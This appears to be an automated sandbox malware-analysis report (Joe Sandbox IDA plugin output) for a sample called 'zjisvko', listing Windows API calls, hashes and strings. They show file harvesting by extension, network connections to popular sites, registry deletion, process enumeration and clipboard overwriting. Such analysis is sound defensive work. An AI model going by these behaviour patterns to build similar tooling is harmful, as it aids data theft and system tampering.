                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                                      • Opcode ID: be5cc59e789f861664658e48bd89c188ad812a6811f4700a052b99e26e539987
                                                                                                                                                                                                                                                      • Instruction ID: 1e1558fb8b0164460d63e7c9d042b0b03a7d8c51ed854541774a8aeec67ebbc2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be5cc59e789f861664658e48bd89c188ad812a6811f4700a052b99e26e539987
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8C092303C0300BAFE314A00AC07F047611A740F01F304014BB80BC0E085E12165960D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                      • Opcode ID: 6a766d55de5806cb64bf156286ed74061e33ddd11af47f180c1e3163fbbd4410
                                                                                                                                                                                                                                                      • Instruction ID: 7233bf50e2f4aa5628624fa1b3fb2043d1fc11f99b5e30410f9e75dee4eb0990
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a766d55de5806cb64bf156286ed74061e33ddd11af47f180c1e3163fbbd4410
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEB012753140008BCB1807349C4D04D35506F447317600B7CB033D11F0D721CD71BA01
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                      • Opcode ID: a699e3b7de746c953ddd410e926f528a0fc1db7196d3279a8b389d05279905bd
                                                                                                                                                                                                                                                      • Instruction ID: b41233fd9f10432f29f029f0335cdb505235e2ac6c4645e7a9acbac9401b36fb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a699e3b7de746c953ddd410e926f528a0fc1db7196d3279a8b389d05279905bd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35E0DF20D4C30466F320A2698C0EBE63A580704324F0004B3AA563B1D2DABD7E9587AF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00405BAD), ref: 00405B25
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                      • Opcode ID: fc5a16abde3c5393a59e43420f29fb8d6d7f096dde32d6ffd8f3b158bb0a1046
                                                                                                                                                                                                                                                      • Instruction ID: b3a6002bbe992a08d0682ba018f63b08d0f08f75ac90016549530ea76ecb5310
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc5a16abde3c5393a59e43420f29fb8d6d7f096dde32d6ffd8f3b158bb0a1046
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDE0CD31A04B205BE7366710BD05B9337E4DF05720F04056BE440371D05B787D81C69D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005,76AE83C0,76AE8A60,00000000), ref: 00401010
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00401028
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040103F
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040108E
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 004011CA
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004011D4
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004011E4
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00401215
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0040121B
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040122B
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040123D
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,00000010), ref: 0040124D
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00401260
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$FileFind$lstrcpywsprintf$CloseCopyFirstNextSleep
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.3gp$.bmp$.doc$.gif$.jpeg$.jpg$.ppt$.rtf$.txt$.xls
                                                                                                                                                                                                                                                      • API String ID: 410483186-4223433645
                                                                                                                                                                                                                                                      • Opcode ID: 1bcf79c679bfb750c70df176564b50a258270a4ebb8da8457167ef855b4bdc68
                                                                                                                                                                                                                                                      • Instruction ID: 8443bdfcda034cd6fdbb2585da044ab3805babf66fc6f46138fa2843509b9348
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bcf79c679bfb750c70df176564b50a258270a4ebb8da8457167ef855b4bdc68
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A55174B29043589BDF25DBA0ED49BDE77ACEB08315F5400ABFD04E2190E778DB948B19
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040C2F4
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: socket.WS2_32(00000002,00000001,00000006), ref: 0040FB65
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: htons.WS2_32(00000050), ref: 0040FB83
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: connect.WS2_32(?,?,00000010), ref: 0040FB96
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: wsprintfA.USER32 ref: 0040FBD0
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: lstrlenA.KERNEL32(?,00000000), ref: 0040FBE3
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: send.WS2_32(?,?,00000000), ref: 0040FBF4
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: select.WS2_32(?,?,00000000,00000000,?), ref: 0040FC3E
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: __WSAFDIsSet.WS2_32(?,00000001), ref: 0040FC4E
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: recv.WS2_32(?,?,00000001,00000000), ref: 0040FC6C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 0040C329
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040C33E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleepconnecthtonslstrlenrecvselectsendsocketwsprintf
                                                                                                                                                                                                                                                      • String ID: www.adobe.com/$www.baidu.com/$www.bbc.co.uk/$www.blogger.com/$www.ebay.com/$www.facebook.com/$www.google.com/$www.imdb.com/$www.myspace.com/$www.wikipedia.org/$www.yahoo.com/$www.youtube.com/
                                                                                                                                                                                                                                                      • API String ID: 3648696511-323873284
                                                                                                                                                                                                                                                      • Opcode ID: 9e277fce805c9b07a1fc8073f56270704cef46285c160d440713ce7cae9850b5
                                                                                                                                                                                                                                                      • Instruction ID: c479cdd90be6b905ce81e7c7198eb54ca4105a7e4ea340f09c4b04c9a81f1d90
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e277fce805c9b07a1fc8073f56270704cef46285c160d440713ce7cae9850b5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A51D132910E247EE753DDBCD8012DBB6676F4E311F4205B1EE05FB120D6F66D4A8A86
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegDeleteValueA.KERNEL32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040607B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,00000001), ref: 0040608C
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040609A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 004060AE
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004060B4
                                                                                                                                                                                                                                                      • Process32First.KERNEL32 ref: 004060CF
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_00005FD0,00000128), ref: 00406102
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000002), ref: 0040610D
                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00406119
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406124
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406130
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseDeleteSleep$CountCreateHandleProcess32TickWindow$CriticalDesktopEnterEnumFirstNextRectSectionSnapshotToolhelp32ValueWindowslstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 409001591-0
                                                                                                                                                                                                                                                      • Opcode ID: 9d0e6eae3604a372fa46df5f1dae91aa69ce446534dff376f8f2ce8baae24cbc
                                                                                                                                                                                                                                                      • Instruction ID: 6d14e935c9f0d40d690cf77a63c9d9c3f0f734b2a94bd45cc227ede2a9c64a07
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d0e6eae3604a372fa46df5f1dae91aa69ce446534dff376f8f2ce8baae24cbc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D22105712443009FE720EB709C49B6B77ACEB40315F01093BF956A12C1DB7CD829C66A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0041394C
                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00413957
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413961
                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041396E
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00413977
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413982
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00413989
                                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00413992
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlocklstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3563369359-0
                                                                                                                                                                                                                                                      • Opcode ID: d1bfc2bec72121191d5fdeca06325dad68d51be11a781bbeb7cc51d1b5ca18e6
                                                                                                                                                                                                                                                      • Instruction ID: 03cfffbadc2426e9481ae38d35fbcacdd2f81c373927c6d6a8f287d221c63894
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1bfc2bec72121191d5fdeca06325dad68d51be11a781bbeb7cc51d1b5ca18e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1E0C9B1645211EFDB222BA0AD0DBAA3A28FF05753F404464F90A91161CF754962CBBB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0042185F
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00421892
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,76AF23A0), ref: 0042189E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,76AF23A0), ref: 004218B5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountSleepTick
                                                                                                                                                                                                                                                      • String ID: (9F
                                                                                                                                                                                                                                                      • API String ID: 2804873075-1478797141
                                                                                                                                                                                                                                                      • Opcode ID: 563e7cb43550c95dcfdcc4b756396648e8eae4d2fb5d0f5d49cce62bc54be093
                                                                                                                                                                                                                                                      • Instruction ID: 602608fe2a53e29e7fbdf509ec23d8455fc930f4c724492092ef177562ae7c18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 563e7cb43550c95dcfdcc4b756396648e8eae4d2fb5d0f5d49cce62bc54be093
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38F05961B083A46FE3106760FC84B2F3B488B62369F444036FC88512A2D75A0924C27F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 0041C86F
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041C89C
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetDesktopWindow.USER32 ref: 0041436A
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(00000000), ref: 00414377
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(00000000,?), ref: 00414381
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowTextA.USER32(00000000,0042A440), ref: 0041438F
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(00000000,00000001,?,?,?), ref: 00414401
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowPos.USER32(00000000,000000FF,?,00000000,00000000,00000000,00000040,?,?,?), ref: 0041441C
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(00000000,00000001,?,?,?), ref: 00414425
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(00000000), ref: 00414432
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(00000000,?,?,?), ref: 0041443B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(00000000), ref: 0041443E
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(00000000,?,?,?), ref: 00414441
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(00000000), ref: 00414444
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(00000000,?,?,?), ref: 00414447
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: Sleep.KERNEL32(00000064,?,?,?), ref: 0041444B
